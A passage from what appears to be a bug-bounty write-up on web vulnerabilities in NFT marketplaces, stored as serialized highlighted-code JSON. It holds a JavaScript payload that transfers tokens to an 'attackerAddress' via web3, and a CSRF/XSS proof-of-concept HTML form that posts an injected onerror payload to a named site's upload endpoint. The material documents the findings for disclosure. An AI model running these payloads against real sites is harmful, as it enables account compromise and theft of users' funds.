tokenContract",{"type":25,"tag":216,"props":35942,"children":35943},{"style":6953},[35944],{"type":31,"value":6956},{"type":25,"tag":216,"props":35946,"children":35947},{"style":6936},[35948],{"type":31,"value":35895},{"type":25,"tag":216,"props":35950,"children":35951},{"style":6947},[35952],{"type":31,"value":35886},{"type":25,"tag":216,"props":35954,"children":35955},{"style":6964},[35956],{"type":31,"value":179},{"type":25,"tag":216,"props":35958,"children":35959},{"style":6947},[35960],{"type":31,"value":35961},"eth",{"type":25,"tag":216,"props":35963,"children":35964},{"style":6964},[35965],{"type":31,"value":179},{"type":25,"tag":216,"props":35967,"children":35968},{"style":7047},[35969],{"type":31,"value":35970},"Contract",{"type":25,"tag":216,"props":35972,"children":35973},{"style":6964},[35974],{"type":31,"value":1850},{"type":25,"tag":216,"props":35976,"children":35977},{"style":6947},[35978],{"type":31,"value":35979},"tokenAbi",{"type":25,"tag":216,"props":35981,"children":35982},{"style":6964},[35983],{"type":31,"value":7026},{"type":25,"tag":216,"props":35985,"children":35986},{"style":6947},[35987],{"type":31,"value":35988},"contractAddress",{"type":25,"tag":216,"props":35990,"children":35991},{"style":6964},[35992],{"type":31,"value":7797},{"type":25,"tag":216,"props":35994,"children":35995},{"class":6922,"line":27590},[35996],{"type":25,"tag":216,"props":35997,"children":35998},{"emptyLinePlaceholder":16},[35999],{"type":31,"value":7642},{"type":25,"tag":216,"props":36001,"children":36002},{"class":6922,"line":27598},[36003,36007,36012,36016],{"type":25,"tag":216,"props":36004,"children":36005},{"style":6936},[36006],{"type":31,"value":35509},{"type":25,"tag":216,"props":36008,"children":36009},{"style":6947},[36010],{"type":31,"value":36011}," transactionObject",{"type":25,"tag":216,"props":36013,"children":36014},{"style":6953},[36015],{"type":31,"value":6956},{"type":25,"tag":216,"props":36017,"children":36018},{"style":6964},[36019],{"type":31,"value":7241},{"type":25,"tag":216,"props":36021,"children":36022},{"class":6922,"line":27606},[36023,36028,36032],{"type":25,"tag":216,"props":36024,"children":36025},{"style":6947},[36026],{"type":31,"value":36027},"        from:",{"type":25,"tag":216,"props":36029,"children":36030},{"style":6947},[36031],{"type":31,"value":35514},{"type":25,"tag":216,"props":36033,"children":36034},{"style":6964},[36035],{"type":31,"value":7465},{"type":25,"tag":216,"props":36037,"children":36038},{"class":6922,"line":27615},[36039,36044,36048],{"type":25,"tag":216,"props":36040,"children":36041},{"style":6947},[36042],{"type":31,"value":36043},"        to:",{"type":25,"tag":216,"props":36045,"children":36046},{"style":6947},[36047],{"type":31,"value":35573},{"type":25,"tag":216,"props":36049,"children":36050},{"style":6964},[36051],{"type":31,"value":7465},{"type":25,"tag":216,"props":36053,"children":36054},{"class":6922,"line":27691},[36055,36060,36064,36068],{"type":25,"tag":216,"props":36056,"children":36057},{"style":6947},[36058],{"type":31,"value":36059},"        data:",{"type":25,"tag":216,"props":36061,"children":36062},{"style":6947},[36063],{"type":31,"value":35940},{"type":25,"tag":216,"props":36065,"children":36066},{"style":6964},[36067],{"type":31,"value":179},{"type":25,"tag":216,"props":36069,"children":36070},{"style":6947},[36071],{"type":31,"value":36072},"methods\n",{"type":25,"tag":216,"props":36074,"children":36075},{"class":6922,"line":27724},[36076,36081,36086,36090,36095,36099,36104,36108,36113,36117,36122,36126,36131,36135,36140],{"type":25,"tag":216,"props":36077,"children":36078},{"style":6964},[36079],{"type":31,"value":36080},"          .",{"type":25,"tag":216,"props":36082,"children":36083},{"style":7047},[36084],{"type":31,"value":36085},"transfer",{"type":25,"tag":216,"props":36087,"children":36088},{"style":6964},[36089],{"type":31,"value":1850},{"type":25,"tag":216,"props":36091,"children":36092},{"style":6947},[36093],{"type":31,"value":36094},"attackerAddress",{"type":25,"tag":216,"props":36096,"children":36097},{"style":6964},[36098],{"type":31,"value":7026},{"type":25,"tag":216,"props":36100,"children":36101},{"style":6947},[36102],{"type":31,"value":36103},"web3",{"type":25,"tag":216,"props":36105,"children":36106},{"style":6964},[36107],{"type":31,"value":179},{"type":25,"tag":216,"props":36109,"children":36110},{"style":6947},[36111],{"type":31,"value":36112},"utils",{"type":25,"tag":216,"props":36114,"children":36115},{"style":6964},[36116],{"type":31,"value":179},{"type":25,"tag":216,"props":36118,"children":36119},{"style":7047},[36120],{"type":31,"value":36121},"toWei",{"type":25,"tag":216,"props":36123,"children":36124},{"style":6964},[36125],{"type":31,"value":1850},{"type":25,"tag":216,"props":36127,"children":36128},{"style":8205},[36129],{"type":31,"value":36130},"'100000000'",{"type":25,"tag":216,"props":36132,"children":36133},{"style":6964},[36134],{"type":31,"value":7026},{"type":25,"tag":216,"props":36136,"children":36137},{"style":8205},[36138],{"type":31,"value":36139},"'ether'",{"type":25,"tag":216,"props":36141,"children":36142},{"style":6964},[36143],{"type":31,"value":23672},{"type":25,"tag":216,"props":36145,"children":36146},{"class":6922,"line":27732},[36147,36151,36156],{"type":25,"tag":216,"props":36148,"children":36149},{"style":6964},[36150],{"type":31,"value":36080},{"type":25,"tag":216,"props":36152,"children":36153},{"style":7047},[36154],{"type":31,"value":36155},"encodeABI",{"type":25,"tag":216,"props":36157,"children":36158},{"style":6964},[36159],{"type":31,"value":7448},{"type":25,"tag":216,"props":36161,"children":36162},{"class":6922,"line":27740},[36163],{"type":25,"tag":216,"props":36164,"children":36165},{"style":6964},[36166],{"type":31,"value":12874},{"type":25,"tag":216,"props":36168,"children":36169},{"class":6922,"line":27777},[36170],{"type":25,"tag":216,"props":36171,"children":36172},{"emptyLinePlaceholder":16},[36173],{"type":31,"value":7642},{"type":25,"tag":216,"props":36175,"children":36176},{"class":6922,"line":27790},[36177,36182,36186,36190,36194,36199,36203,36208],{"type":25,"tag":216,"props":36178,"children":36179},{"style":6947},[36180],{"type":31,"value":36181},"      web3",{"type":25,"tag":216,"props":36183,"children":36184},{"style":6964},[36185],{"type":31,"value":179},{"type":25,"tag":216,"props":36187,"children":36188},{"style":6947},[36189],{"type":31,"value":35961},{"type":25,"tag":216,"props":36191,"children":36192},{"style":6964},[36193],{"type":31,"value":179},{"type":25,"tag":216,"props":36195,"children":36196},{"style":7047},[36197],{"type":31,"value":36198},"sendTransaction",{"type":25,"tag":216,"props":36200,"children":36201},{"style":6964},[36202],{"type":31,"value":1850},{"type":25,"tag":216,"props":36204,"children":36205},{"style":6947},[36206],{"type":31,"value":36207},"transactionObject",{"type":25,"tag":216,"props":36209,"children":36210},{"style":6964},[36211],{"type":31,"value":7797},{"type":25,"tag":216,"props":36213,"children":36214},{"class":6922,"line":27803},[36215],{"type":25,"tag":216,"props":36216,"children":36217},{"style":6964},[36218],{"type":31,"value":36219},"    });\n",{"type":25,"tag":216,"props":36221,"children":36222},{"class":6922,"line":27816},[36223],{"type":25,"tag":216,"props":36224,"children":36225},{"style":6964},[36226],{"type":31,"value":9823},{"type":25,"tag":216,"props":36228,"children":36229},{"class":6922,"line":27870},[36230],{"type":25,"tag":216,"props":36231,"children":36232},{"style":6964},[36233],{"type":31,"value":7874},{"type":25,"tag":216,"props":36235,"children":36236},{"class":6922,"line":27879},[36237],{"type":25,"tag":216,"props":36238,"children":36239},{"emptyLinePlaceholder":16},[36240],{"type":31,"value":7642},{"type":25,"tag":216,"props":36242,"children":36244},{"class":6922,"line":36243},51,[36245,36249,36253,36258],{"type":25,"tag":216,"props":36246,"children":36247},{"style":6936},[36248],{"type":31,"value":23443},{"type":25,"tag":216,"props":36250,"children":36251},{"style":6964},[36252],{"type":31,"value":1850},{"type":25,"tag":216,"props":36254,"children":36255},{"style":8205},[36256],{"type":31,"value":36257},"'https://cdn.jsdelivr.net/gh/ethereum/web3.js@1.0.0-beta.36/dist/web3.min.js'",{"type":25,"tag":216,"props":36259,"children":36260},{"style":6964},[36261],{"type":31,"value":7797},{"type":25,"tag":216,"props":36263,"children":36265},{"class":6922,"line":36264},52,[36266,36271,36275,36279,36283,36288],{"type":25,"tag":216,"props":36267,"children":36268},{"style":7047},[36269],{"type":31,"value":36270},"setTimeout",{"type":25,"tag":216,"props":36272,"children":36273},{"style":6964},[36274],{"type":31,"value":1850},{"type":25,"tag":216,"props":36276,"children":36277},{"style":6947},[36278],{"type":31,"value":35455},{"type":25,"tag":216,"props":36280,"children":36281},{"style":6964},[36282],{"type":31,"value":7026},{"type":25,"tag":216,"props":36284,"children":36285},{"style":6989},[36286],{"type":31,"value":36287},"1e3",{"type":25,"tag":216,"props":36289,"children":36290},{"style":6964},[36291],{"type":31,"value":7797},{"type":25,"tag":38,"props":36293,"children":36294},{},[36295,36300],{"type":25,"tag":9273,"props":36296,"children":36297},{},[36298],{"type":31,"value":36299},"CSRF & XSS",{"type":31,"value":36301},"\nWe continued our investigation of potential XSS vulnerabilities by exploring various sinks, such as common field errors and the handling of file uploads in different marketplaces.",{"type":25,"tag":38,"props":36303,"children":36304},{},[36305,36307,36312],{"type":31,"value":36306},"Our attention was drawn to ",{"type":25,"tag":162,"props":36308,"children":36310},{"href":35242,"rel":36309},[166],[36311],{"type":31,"value":35246},{"type":31,"value":36313},", an online platform that allows users to upload images. During the image uploading process, we noticed that certain parameters were being sent in the request, as shown below:",{"type":25,"tag":38,"props":36315,"children":36316},{},[36317],{"type":25,"tag":6467,"props":36318,"children":36320},{"alt":7,"src":36319},"/posts/web2-bug-repellant-instructions/csrf.png",[],{"type":25,"tag":38,"props":36322,"children":36323},{},[36324],{"type":31,"value":36325},"and here there is the code:",{"type":25,"tag":206,"props":36327,"children":36329},{"className":35325,"code":36328,"language":35327,"meta":7,"style":7},"\u003Chtml>\n  \u003Cbody>\n  \u003Cscript>history.pushState('', '', '/')\u003C/script>\n    \u003Cform id=\"form123\" action=\"https://stashh.io/upload_asset\" method=\"POST\" enctype=\"multipart/form-data\" value=\"asd\">\n     \u003Cinput type=\"file\" name=\"data\" id=\"file123\">\n      \u003Cinput type=\"hidden\" name=\"config\" value=\"{"address":"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq<img/src=x onerror=alert(document.domain)>","to":"profile-assets","type":"icon"}\" />\n      \u003Cinput type=\"submit\" value=\"Submit request\" />\n    \u003C/form>\n  \u003C/body>\n\n  \u003Cscript>\n\n    (async ()=>{\n        const blob = await (await fetch(\"/sapo.png\")).blob()\n\n        let f = new File([blob], 'sapo.png', {type: 'image/png'})\n        const dataTransfer = new DataTransfer();\n        dataTransfer.items.add(f);\n\n        file123.files = dataTransfer.files;\n    })()\n\n  \u003C/script>\n\u003C/html>\n",[36330],{"type":25,"tag":82,"props":36331,"children":36332},{"__ignoreMap":7},[36333,36350,36367,36401,36487,36544,36743,36784,36800,36816,36823,36838,36845,36857,36915,36922,36985,37014,37052,37059,37097,37110,37117,37132],{"type":25,"tag":216,"props":36334,"children":36335},{"class":6922,"line":6923},[36336,36341,36346],{"type":25,"tag":216,"props":36337,"children":36339},{"style":36338},"--shiki-default:#808080",[36340],{"type":31,"value":9757},{"type":25,"tag":216,"props":36342,"children":36343},{"style":6936},[36344],{"type":31,"value":36345},"html",{"type":25,"tag":216,"props":36347,"children":36348},{"style":36338},[36349],{"type":31,"value":9943},{"type":25,"tag":216,"props":36351,"children":36352},{"class":6922,"line":6769},[36353,36358,36363],{"type":25,"tag":216,"props":36354,"children":36355},{"style":36338},[36356],{"type":31,"value":36357},"  \u003C",{"type":25,"tag":216,"props":36359,"children":36360},{"style":6936},[36361],{"type":31,"value":36362},"body",{"type":25,"tag":216,"props":36364,"children":36365},{"style":36338},[36366],{"type":31,"value":9943},{"type":25,"tag":216,"props":36368,"children":36369},{"class":6922,"line":6778},[36370,36374,36379,36383,36388,36393,36397],{"type":25,"tag":216,"props":36371,"children":36372},{"style":36338},[36373],{"type":31,"value":36357},{"type":25,"tag":216,"props":36375,"children":36376},{"style":6936},[36377],{"type":31,"value":36378},"script",{"type":25,"tag":216,"props":36380,"children":36381},{"style":36338},[36382],{"type":31,"value":5902},{"type":25,"tag":216,"props":36384,"children":36385},{"style":6964},[36386],{"type":31,"value":36387},"history.pushState('', '', '/')",{"type":25,"tag":216,"props":36389,"children":36390},{"style":36338},[36391],{"type":31,"value":36392},"\u003C/",{"type":25,"tag":216,"props":36394,"children":36395},{"style":6936},[36396],{"type":31,"value":36378},{"type":25,"tag":216,"props":36398,"children":36399},{"style":36338},[36400],{"type":31,"value":9943},{"type":25,"tag":216,"props":36402,"children":36403},{"class":6922,"line":7005},[36404,36409,36414,36419,36423,36428,36433,36437,36442,36446,36450,36455,36460,36464,36469,36474,36478,36483],{"type":25,"tag":216,"props":36405,"children":36406},{"style":36338},[36407],{"type":31,"value":36408},"    \u003C",{"type":25,"tag":216,"props":36410,"children":36411},{"style":6936},[36412],{"type":31,"value":36413},"form",{"type":25,"tag":216,"props":36415,"children":36416},{"style":6947},[36417],{"type":31,"value":36418}," id",{"type":25,"tag":216,"props":36420,"children":36421},{"style":6953},[36422],{"type":31,"value":266},{"type":25,"tag":216,"props":36424,"children":36425},{"style":8205},[36426],{"type":31,"value":36427},"\"form123\"",{"type":25,"tag":216,"props":36429,"children":36430},{"style":6947},[36431],{"type":31,"value":36432}," action",{"type":25,"tag":216,"props":36434,"children":36435},{"style":6953},[36436],{"type":31,"value":266},{"type":25,"tag":216,"props":36438,"children":36439},{"style":8205},[36440],{"type":31,"value":36441},"\"https://stashh.io/upload_asset\"",{"type":25,"tag":216,"props":36443,"children":36444},{"style":6947},[36445],{"type":31,"value":21068},{"type":25,"tag":216,"props":36447,"children":36448},{"style":6953},[36449],{"type":31,"value":266},{"type":25,"tag":216,"props":36451,"children":36452},{"style":8205},[36453],{"type":31,"value":36454},"\"POST\"",{"type":25,"tag":216,"props":36456,"children":36457},{"style":6947},[36458],{"type":31,"value":36459}," enctype",{"type":25,"tag":216,"props":36461,"children":36462},{"style":6953},[36463],{"type":31,"value":266},{"type":25,"tag":216,"props":36465,"children":36466},{"style":8205},[36467],{"type":31,"value":36468},"\"multipart/form-data\"",{"type":25,"tag":216,"props":36470,"children":36471},{"style":6947},[36472],{"type":31,"value":36473}," value",{"type":25,"tag":216,"props":36475,"children":36476},{"style":6953},[36477],{"type":31,"value":266},{"type":25,"tag":216,"props":36479,"children":36480},{"style":8205},[36481],{"type":31,"value":36482},"\"asd\"",{"type":25,"tag":216,"props":36484,"children":36485},{"style":36338},[36486],{"type":31,"value":9943},{"type":25,"tag":216,"props":36488,"children":36489},{"class":6922,"line":7110},[36490,36495,36499,36504,36508,36513,36518,36522,36527,36531,36535,36540],{"type":25,"tag":216,"props":36491,"children":36492},{"style":36338},[36493],{"type":31,"value":36494},"     \u003C",{"type":25,"tag":216,"props":36496,"children":36497},{"style":6936},[36498],{"type":31,"value":12319},{"type":25,"tag":216,"props":36500,"children":36501},{"style":6947},[36502],{"type":31,"value":36503}," type",{"type":25,"tag":216,"props":36505,"children":36506},{"style":6953},[36507],{"type":31,"value":266},{"type":25,"tag":216,"props":36509,"children":36510},{"style":8205},[36511],{"type":31,"value":36512},"\"file\"",{"type":25,"tag":216,"props":36514,"children":36515},{"style":6947},[36516],{"type":31,"value":36517}," name",{"type":25,"tag":216,"props":36519,"children":36520},{"style":6953},[36521],{"type":31,"value":266},{"type":25,"tag":216,"props":36523,"children":36524},{"style":8205},[36525],{"type":31,"value":36526},"\"data\"",{"type":25,"tag":216,"props":36528,"children":36529},{"style":6947},[36530],{"type":31,"value":36418},{"type":25,"tag":216,"props":36532,"children":36533},{"style":6953},[36534],{"type":31,"value":266},{"type":25,"tag":216,"props":36536,"children":36537},{"style":8205},[36538],{"type":31,"value":36539},"\"file123\"",{"type":25,"tag":216,"props":36541,"children":36542},{"style":36338},[36543],{"type":31,"value":9943},{"type":25,"tag":216,"props":36545,"children":36546},{"class":6922,"line":7216},[36547,36552,36556,36560,36564,36569,36573,36577,36582,36586,36590,36594,36599,36604,36609,36614,36619,36623,36628,36633,36638,36642,36647,36652,36656,36661,36666,36671,36676,36681,36686,36691,36695,36700,36705,36710,36715,36720,36724,36729,36734,36738],{"type":25,"tag":216,"props":36548,"children":36549},{"style":36338},[36550],{"type":31,"value":36551},"      \u003C",{"type":25,"tag":216,"props":36553,"children":36554},{"style":6936},[36555],{"type":31,"value":12319},{"type":25,"tag":216,"props":36557,"children":36558},{"style":6947},[36559],{"type":31,"value":36503},{"type":25,"tag":216,"props":36561,"children":36562},{"style":6953},[36563],{"type":31,"value":266},{"type":25,"tag":216,"props":36565,"children":36566},{"style":8205},[36567],{"type":31,"value":36568},"\"hidden\"",{"type":25,"tag":216,"props":36570,"children":36571},{"style":6947},[36572],{"type":31,"value":36517},{"type":25,"tag":216,"props":36574,"children":36575},{"style":6953},[36576],{"type":31,"value":266},{"type":25,"tag":216,"props":36578,"children":36579},{"style":8205},[36580],{"type":31,"value":36581},"\"config\"",{"type":25,"tag":216,"props":36583,"children":36584},{"style":6947},[36585],{"type":31,"value":36473},{"type":25,"tag":216,"props":36587,"children":36588},{"style":6953},[36589],{"type":31,"value":266},{"type":25,"tag":216,"props":36591,"children":36592},{"style":8205},[36593],{"type":31,"value":24020},{"type":25,"tag":216,"props":36595,"children":36596},{"style":6936},[36597],{"type":31,"value":36598},"{"",{"type":25,"tag":216,"props":36600,"children":36601},{"style":8205},[36602],{"type":31,"value":36603},"address",{"type":25,"tag":216,"props":36605,"children":36606},{"style":6936},[36607],{"type":31,"value":36608},"":"",{"type":25,"tag":216,"props":36610,"children":36611},{"style":8205},[36612],{"type":31,"value":36613},"secret1k6tng55v0zgufpcx8wa2w33asl82fhx84tn3hq",{"type":25,"tag":216,"props":36615,"children":36616},{"style":6936},[36617],{"type":31,"value":36618},"<",{"type":25,"tag":216,"props":36620,"children":36621},{"style":8205},[36622],{"type":31,"value":6467},{"type":25,"tag":216,"props":36624,"children":36625},{"style":6936},[36626],{"type":31,"value":36627},"/",{"type":25,"tag":216,"props":36629,"children":36630},{"style":8205},[36631],{"type":31,"value":36632},"src",{"type":25,"tag":216,"props":36634,"children":36635},{"style":6936},[36636],{"type":31,"value":36637},"=",{"type":25,"tag":216,"props":36639,"children":36640},{"style":8205},[36641],{"type":31,"value":2541},{"type":25,"tag":216,"props":36643,"children":36644},{"style":6936},[36645],{"type":31,"value":36646}," ",{"type":25,"tag":216,"props":36648,"children":36649},{"style":8205},[36650],{"type":31,"value":36651},"onerror",{"type":25,"tag":216,"props":36653,"children":36654},{"style":6936},[36655],{"type":31,"value":36637},{"type":25,"tag":216,"props":36657,"children":36658},{"style":8205},[36659],{"type":31,"value":36660},"alert",{"type":25,"tag":216,"props":36662,"children":36663},{"style":6936},[36664],{"type":31,"value":36665},"(",{"type":25,"tag":216,"props":36667,"children":36668},{"style":8205},[36669],{"type":31,"value":36670},"document",{"type":25,"tag":216,"props":36672,"children":36673},{"style":6936},[36674],{"type":31,"value":36675},".",{"type":25,"tag":216,"props":36677,"children":36678},{"style":8205},[36679],{"type":31,"value":36680},"domain",{"type":25,"tag":216,"props":36682,"children":36683},{"style":6936},[36684],{"type":31,"value":36685},")>","",{"type":25,"tag":216,"props":36687,"children":36688},{"style":8205},[36689],{"type":31,"value":36690},"to",{"type":25,"tag":216,"props":36692,"children":36693},{"style":6936},[36694],{"type":31,"value":36608},{"type":25,"tag":216,"props":36696,"children":36697},{"style":8205},[36698],{"type":31,"value":36699},"profile",{"type":25,"tag":216,"props":36701,"children":36702},{"style":6936},[36703],{"type":31,"value":36704},"-",{"type":25,"tag":216,"props":36706,"children":36707},{"style":8205},[36708],{"type":31,"value":36709},"assets",{"type":25,"tag":216,"props":36711,"children":36712},{"style":6936},[36713],{"type":31,"value":36714},"","",{"type":25,"tag":216,"props":36716,"children":36717},{"style":8205},[36718],{"type":31,"value":36719},"type",{"type":25,"tag":216,"props":36721,"children":36722},{"style":6936},[36723],{"type":31,"value":36608},{"type":25,"tag":216,"props":36725,"children":36726},{"style":8205},[36727],{"type":31,"value":36728},"icon",{"type":25,"tag":216,"props":36730,"children":36731},{"style":6936},[36732],{"type":31,"value":36733},""}",{"type":25,"tag":216,"props":36735,"children":36736},{"style":8205},[36737],{"type":31,"value":24020},{"type":25,"tag":216,"props":36739,"children":36740},{"style":36338},[36741],{"type":31,"value":36742}," />\n",{"type":25,"tag":216,"props":36744,"children":36745},{"class":6922,"line":7244},[36746,36750,36754,36758,36762,36767,36771,36775,36780],{"type":25,"tag":216,"props":36747,"children":36748},{"style":36338},[36749],{"type":31,"value":36551},{"type":25,"tag":216,"props":36751,"children":36752},{"style":6936},[36753],{"type":31,"value":12319},{"type":25,"tag":216,"props":36755,"children":36756},{"style":6947},[36757],{"type":31,"value":36503},{"type":25,"tag":216,"props":36759,"children":36760},{"style":6953},[36761],{"type":31,"value":266},{"type":25,"tag":216,"props":36763,"children":36764},{"style":8205},[36765],{"type":31,"value":36766},"\"submit\"",{"type":25,"tag":216,"props":36768,"children":36769},{"style":6947},[36770],{"type":31,"value":36473},{"type":25,"tag":216,"props":36772,"children":36773},{"style":6953},[36774],{"type":31,"value":266},{"type":25,"tag":216,"props":36776,"children":36777},{"style":8205},[36778],{"type":31,"value":36779},"\"Submit request\"",{"type":25,"tag":216,"props":36781,"children":36782},{"style":36338},[36783],{"type":31,"value":36742},{"type":25,"tag":216,"props":36785,"children":36786},{"class":6922,"line":7257},[36787,36792,36796],{"type":25,"tag":216,"props":36788,"children":36789},{"style":36338},[36790],{"type":31,"value":36791},"    \u003C/",{"type":25,"tag":216,"props":36793,"children":36794},{"style":6936},[36795],{"type":31,"value":36413},{"type":25,"tag":216,"props":36797,"children":36798},{"style":36338},[36799],{"type":31,"value":9943},{"type":25,"tag":216,"props":36801,"children":36802},{"class":6922,"line":7275},[36803,36808,36812],{"type":25,"tag":216,"props":36804,"children":36805},{"style":36338},[36806],{"type":31,"value":36807},"  \u003C/",{"type":25,"tag":216,"props":36809,"children":36810},{"style":6936},[36811],{"type":31,"value":36362},{"type":25,"tag":216,"props":36813,"children":36814},{"style":36338},[36815],{"type":31,"value":9943},{"type":25,"tag":216,"props":36817,"children":36818},{"class":6922,"line":7296},[36819],{"type":25,"tag":216,"props":36820,"children":36821},{"emptyLinePlaceholder":16},[36822],{"type":31,"value":7642},{"type":25,"tag":216,"props":36824,"children":36825},{"class":6922,"line":7305},[36826,36830,36834],{"type":25,"tag":216,"props":36827,"children":36828},{"style":36338},[36829],{"type":31,"value":36357},{"type":25,"tag":216,"props":36831,"children":36832},{"style":6936},[36833],{"type":31,"value":36378},{"type":25,"tag":216,"props":36835,"children":36836},{"style":36338},[36837],{"type":31,"value":9943},{"type":25,"tag":216,"props":36839,"children":36840},{"class":6922,"line":7557},[36841],{"type":25,"tag":216,"props":36842,"children":36843},{"emptyLinePlaceholder":16},[36844],{"type":31,"value":7642},{"type":25,"tag":216,"props":36846,"children":36847},{"class":6922,"line":7574},[36848,36853],{"type":25,"tag":216,"props":36849,"children":36850},{"style":6964},[36851],{"type":31,"value":36852},"    (async ()=>",{"type":25,"tag":216,"props":36854,"children":36855},{"style":6936},[36856],{"type":31,"value":14836},{"type":25,"tag":216,"props":36858,"children":36859},{"class":6922,"line":7591},[36860,36865,36870,36874,36879,36883,36887,36892,36896,36901,36906,36911],{"type":25,"tag":216,"props":36861,"children":36862},{"style":6947},[36863],{"type":31,"value":36864},"        const",{"type":25,"tag":216,"props":36866,"children":36867},{"style":6947},[36868],{"type":31,"value":36869}," blob",{"type":25,"tag":216,"props":36871,"children":36872},{"style":6953},[36873],{"type":31,"value":4983},{"type":25,"tag":216,"props":36875,"children":36876},{"style":6973},[36877],{"type":31,"value":36878},"await",{"type":25,"tag":216,"props":36880,"children":36881},{"style":6953},[36882],{"type":31,"value":7016},{"type":25,"tag":216,"props":36884,"children":36885},{"style":6973},[36886],{"type":31,"value":36878},{"type":25,"tag":216,"props":36888,"children":36889},{"style":7047},[36890],{"type":31,"value":36891}," fetch",{"type":25,"tag":216,"props":36893,"children":36894},{"style":6953},[36895],{"type":31,"value":1850},{"type":25,"tag":216,"props":36897,"children":36898},{"style":8205},[36899],{"type":31,"value":36900},"\"/sapo.png\"",{"type":25,"tag":216,"props":36902,"children":36903},{"style":6953},[36904],{"type":31,"value":36905},")).",{"type":25,"tag":216,"props":36907,"children":36908},{"style":7047},[36909],{"type":31,"value":36910},"blob",{"type":25,"tag":216,"props":36912,"children":36913},{"style":6953},[36914],{"type":31,"value":11687},{"type":25,"tag":216,"props":36916,"children":36917},{"class":6922,"line":7604},[36918],{"type":25,"tag":216,"props":36919,"children":36920},{"emptyLinePlaceholder":16},[36921],{"type":31,"value":7642},{"type":25,"tag":216,"props":36923,"children":36924},{"class":6922,"line":7613},[36925,36929,36934,36938,36942,36947,36952,36956,36960,36965,36970,36975,36980],{"type":25,"tag":216,"props":36926,"children":36927},{"style":6947},[36928],{"type":31,"value":7011},{"type":25,"tag":216,"props":36930,"children":36931},{"style":6947},[36932],{"type":31,"value":36933}," f",{"type":25,"tag":216,"props":36935,"children":36936},{"style":6953},[36937],{"type":31,"value":4983},{"type":25,"tag":216,"props":36939,"children":36940},{"style":6936},[36941],{"type":31,"value":19080},{"type":25,"tag":216,"props":36943,"children":36944},{"style":7047},[36945],{"type":31,"value":36946}," File",{"type":25,"tag":216,"props":36948,"children":36949},{"style":6953},[36950],{"type":31,"value":36951},"([",{"type":25,"tag":216,"props":36953,"children":36954},{"style":6947},[36955],{"type":31,"value":36910},{"type":25,"tag":216,"props":36957,"children":36958},{"style":6953},[36959],{"type":31,"value":27006},{"type":25,"tag":216,"props":36961,"children":36962},{"style":8205},[36963],{"type":31,"value":36964},"'sapo.png'",{"type":25,"tag":216,"props":36966,"children":36967},{"style":6953},[36968],{"type":31,"value":36969},", {",{"type":25,"tag":216,"props":36971,"children":36972},{"style":6947},[36973],{"type":31,"value":36974},"type:",{"type":25,"tag":216,"props":36976,"children":36977},{"style":8205},[36978],{"type":31,"value":36979}," 'image/png'",{"type":25,"tag":216,"props":36981,"children":36982},{"style":6953},[36983],{"type":31,"value":36984},"})\n",{"type":25,"tag":216,"props":36986,"children":36987},{"class":6922,"line":7636},[36988,36992,36997,37001,37005,37010],{"type":25,"tag":216,"props":36989,"children":36990},{"style":6947},[36991],{"type":31,"value":36864},{"type":25,"tag":216,"props":36993,"children":36994},{"style":6947},[36995],{"type":31,"value":36996}," dataTransfer",{"type":25,"tag":216,"props":36998,"children":36999},{"style":6953},[37000],{"type":31,"value":4983},{"type":25,"tag":216,"props":37002,"children":37003},{"style":6936},[37004],{"type":31,"value":19080},{"type":25,"tag":216,"props":37006,"children":37007},{"style":7047},[37008],{"type":31,"value":37009}," DataTransfer",{"type":25,"tag":216,"props":37011,"children":37012},{"style":6953},[37013],{"type":31,"value":7633},{"type":25,"tag":216,"props":37015,"children":37016},{"class":6922,"line":7645},[37017,37022,37026,37031,37035,37039,37043,37048],{"type":25,"tag":216,"props":37018,"children":37019},{"style":6947},[37020],{"type":31,"value":37021},"        dataTransfer",{"type":25,"tag":216,"props":37023,"children":37024},{"style":6953},[37025],{"type":31,"value":179},{"type":25,"tag":216,"props":37027,"children":37028},{"style":6947},[37029],{"type":31,"value":37030},"items",{"type":25,"tag":216,"props":37032,"children":37033},{"style":6953},[37034],{"type":31,"value":179},{"type":25,"tag":216,"props":37036,"children":37037},{"style":7047},[37038],{"type":31,"value":13594},{"type":25,"tag":216,"props":37040,"children":37041},{"style":6953},[37042],{"type":31,"value":1850},{"type":25,"tag":216,"props":37044,"children":37045},{"style":6947},[37046],{"type":31,"value":37047},"f",{"type":25,"tag":216,"props":37049,"children":37050},{"style":6953},[37051],{"type":31,"value":7797},{"type":25,"tag":216,"props":37053,"children":37054},{"class":6922,"line":7654},[37055],{"type":25,"tag":216,"props":37056,"children":37057},{"emptyLinePlaceholder":16},[37058],{"type":31,"value":7642},{"type":25,"tag":216,"props":37060,"children":37061},{"class":6922,"line":7722},[37062,37067,37071,37076,37080,37085,37089,37093],{"type":25,"tag":216,"props":37063,"children":37064},{"style":6947},[37065],{"type":31,"value":37066},"        file123",{"type":25,"tag":216,"props":37068,"children":37069},{"style":6953},[37070],{"type":31,"value":179},{"type":25,"tag":216,"props":37072,"children":37073},{"style":6947},[37074],{"type":31,"value":37075},"files",{"type":25,"tag":216,"props":37077,"children":37078},{"style":6953},[37079],{"type":31,"value":4983},{"type":25,"tag":216,"props":37081,"children":37082},{"style":6947},[37083],{"type":31,"value":37084},"dataTransfer",{"type":25,"tag":216,"props":37086,"children":37087},{"style":6953},[37088],{"type":31,"value":179},{"type":25,"tag":216,"props":37090,"children":37091},{"style":6947},[37092],{"type":31,"value":37075},{"type":25,"tag":216,"props":37094,"children":37095},{"style":6953},[37096],{"type":31,"value":6967},{"type":25,"tag":216,"props":37098,"children":37099},{"class":6922,"line":7730},[37100,37105],{"type":25,"tag":216,"props":37101,"children":37102},{"style":6936},[37103],{"type":31,"value":37104},"    }",{"type":25,"tag":216,"props":37106,"children":37107},{"style":6964},[37108],{"type":31,"value":37109},")()\n",{"type":25,"tag":216,"props":37111,"children":37112},{"class":6922,"line":7760},[37113],{"type":25,"tag":216,"props":37114,"children":37115},{"emptyLinePlaceholder":16},[37116],{"type":31,"value":7642},{"type":25,"tag":216,"props":37118,"children":37119},{"class":6922,"line":7768},[37120,37124,37128],{"type":25,"tag":216,"props":37121,"children":37122},{"style":36338},[37123],{"type":31,"value":36807},{"type":25,"tag":216,"props":37125,"children":37126},{"style":6936},[37127],{"type":31,"value":36378},{"type":25,"tag":216,"props":37129,"children":37130},{"style":36338},[37131],{"type":31,"value":9943},{"type":25,"tag":216,"props":37133,"children":37134},{"class":6922,"line":7800},[37135,37139,37143],{"type":25,"tag":216,"props":37136,"children":37137},{"style":36338},[37138],{"type":31,"value":36392},{"type":25,"tag":216,"props":37140,"children":37141},{"style":6936},[37142],{"type":31,"value":36345},{"type":25,"tag":216,"props":37144,